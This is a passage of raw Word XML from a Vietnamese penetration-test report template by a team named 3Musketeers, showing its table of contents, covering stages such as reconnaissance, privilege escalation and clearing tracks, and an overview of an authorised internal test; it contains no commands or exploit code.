          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F69CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-- Lưu hành nội bộ --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C799EFC" w14:textId="1EFC0807" w:rsidR="00336ACC" w:rsidRPr="00CC0D90" w:rsidRDefault="000E2D70" w:rsidP="006156AE">
      <w:pPr>
        <w:pStyle w:val="GridTable31"/>
      </w:pPr>
      <w:r>
        <w:t>Mục lục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB4254D" w14:textId="0891D1B6" w:rsidR="00A8311F" w:rsidRPr="00B92353" w:rsidRDefault="00FE140A">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43634">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E43634">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-4" \h \z \u </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E43634">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc57241311" w:history="1">
        <w:r w:rsidR="00A8311F" w:rsidRPr="005C696C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>1.0 Tổng quan</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc57241311 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6907BD6F" w14:textId="1E8A675C" w:rsidR="00A8311F" w:rsidRPr="00B92353" w:rsidRDefault="00911B8A">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc57241312" w:history="1">
        <w:r w:rsidR="00A8311F" w:rsidRPr="005C696C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>1.1 Khuyến nghị bảo mật</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc57241312 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68FB2995" w14:textId="39368E2C" w:rsidR="00A8311F" w:rsidRPr="00B92353" w:rsidRDefault="00911B8A">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc57241313" w:history="1">
        <w:r w:rsidR="00A8311F" w:rsidRPr="005C696C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>2.0 Phương pháp kiểm thử</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc57241313 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0677264E" w14:textId="66FE085D" w:rsidR="00A8311F" w:rsidRPr="00B92353" w:rsidRDefault="00911B8A">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc57241314" w:history="1">
        <w:r w:rsidR="00A8311F" w:rsidRPr="005C696C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>2.1 Thu thập thông tin</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc57241314 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24052467" w14:textId="1598C781" w:rsidR="00A8311F" w:rsidRPr="00B92353" w:rsidRDefault="00911B8A">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc57241315" w:history="1">
        <w:r w:rsidR="00A8311F" w:rsidRPr="005C696C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>2.2 Kiểm thử xâm nhập</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc57241315 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74524161" w14:textId="4476C864" w:rsidR="00A8311F" w:rsidRPr="00B92353" w:rsidRDefault="00911B8A">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc57241316" w:history="1">
        <w:r w:rsidR="00A8311F" w:rsidRPr="005C696C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.2.1 Địa chỉ IP của máy tồn tại lỗ hổng: X.X.X.X</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc57241316 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12A32EC3" w14:textId="0D26746C" w:rsidR="00A8311F" w:rsidRPr="00B92353" w:rsidRDefault="00911B8A">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc57241317" w:history="1">
        <w:r w:rsidR="00A8311F" w:rsidRPr="005C696C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Thông tin dịch vụ</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc57241317 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1945A085" w14:textId="647BAD19" w:rsidR="00A8311F" w:rsidRPr="00B92353" w:rsidRDefault="00911B8A">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc57241318" w:history="1">
        <w:r w:rsidR="00A8311F" w:rsidRPr="005C696C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Khởi tạo shell với quyền user thường</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc57241318 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F2BD234" w14:textId="4CDA25E4" w:rsidR="00A8311F" w:rsidRPr="00B92353" w:rsidRDefault="00911B8A">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc57241319" w:history="1">
        <w:r w:rsidR="00A8311F" w:rsidRPr="005C696C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Leo thang đặc quyền</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc57241319 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F2BDE18" w14:textId="318F86EA" w:rsidR="00A8311F" w:rsidRPr="00B92353" w:rsidRDefault="00911B8A">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc57241320" w:history="1">
        <w:r w:rsidR="00A8311F" w:rsidRPr="005C696C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>2.3 Duy trì quyền truy cập</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc57241320 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00F42A52" w14:textId="08E28E81" w:rsidR="00A8311F" w:rsidRPr="00B92353" w:rsidRDefault="00911B8A">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc57241321" w:history="1">
        <w:r w:rsidR="00A8311F" w:rsidRPr="005C696C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>2.4 Xóa dấu vết</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc57241321 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="320838F9" w14:textId="22DEBA5B" w:rsidR="00A8311F" w:rsidRPr="00B92353" w:rsidRDefault="00911B8A">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc57241322" w:history="1">
        <w:r w:rsidR="00A8311F" w:rsidRPr="005C696C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>3.0 Phụ lục</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc57241322 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="007E703E" w14:textId="47DEACC2" w:rsidR="00A8311F" w:rsidRPr="00B92353" w:rsidRDefault="00911B8A">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc57241323" w:history="1">
        <w:r w:rsidR="00A8311F" w:rsidRPr="005C696C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>3.1 Phụ lục 1 – Nội dung tập tin local.txt và proof.txt</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc57241323 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="00A8311F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0FCD4D95" w14:textId="0DA4B9F4" w:rsidR="00336ACC" w:rsidRDefault="00FE140A" w:rsidP="00505021">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E43634">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E19B13" w14:textId="77777777" w:rsidR="0070499C" w:rsidRDefault="00067EEB" w:rsidP="006156AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC0D90">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52260627" w14:textId="5A676F62" w:rsidR="00F3239C" w:rsidRPr="00D05018" w:rsidRDefault="00FB3DFF" w:rsidP="006156AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc57241311"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="000F03F3" w:rsidRPr="00D05018">
        <w:t xml:space="preserve">.0 </w:t>
      </w:r>
      <w:r w:rsidR="000F510B">
        <w:t>Tổng quan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="17C6D96B" w14:textId="2170B477" w:rsidR="00F16277" w:rsidRPr="00F043C0" w:rsidRDefault="008F34C9" w:rsidP="00505021">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F34C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>3Musketeers</w:t>
      </w:r>
      <w:r w:rsidR="00F3239C" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F510B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">được giao nhiệm vụ thực hiện một bài kiểm tra xâm nhập nội bộ cho hệ thống CNTT đã được chuẩn bị sẵn. </w:t>
      </w:r>
      <w:r w:rsidR="00821DB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Mục tiêu</w:t>
      </w:r>
      <w:r w:rsidR="00821DB8" w:rsidRPr="00821DB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> của bài kiểm tra này là thực hiện các cuộc tấn công, tương tự như tấn công của tin tặc và cố gắng xâm nhập vào hệ thống </w:t>
      </w:r>
      <w:r w:rsidR="00821DB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>CNTT</w:t>
      </w:r>
      <w:r w:rsidR="00821DB8" w:rsidRPr="00821DB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00821DB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>của tổ chức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428F89C7" w14:textId="7A2DB858" w:rsidR="00A33DBB" w:rsidRDefault="00821DB8" w:rsidP="00505021">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong khi thực hiện kiểm tra xâm nhập, có một số lỗ hổng được xác định trên hệ thống CNTT của đơn vị. Khi thực hiện các cuộc tấn công, </w:t>
      </w:r>
      <w:r w:rsidR="008F34C9" w:rsidRPr="008F34C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>3Musketeers</w:t>
      </w:r>
      <w:r w:rsidR="008F34C9" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">có thể truy cập vào nhiều máy, chủ yếu là do không cập nhật các bản vá lỗi và cấu hình bảo mật </w:t>
      </w:r>
      <w:r w:rsidR="00C46508">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>kém</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C46508">
        <w:rPr>
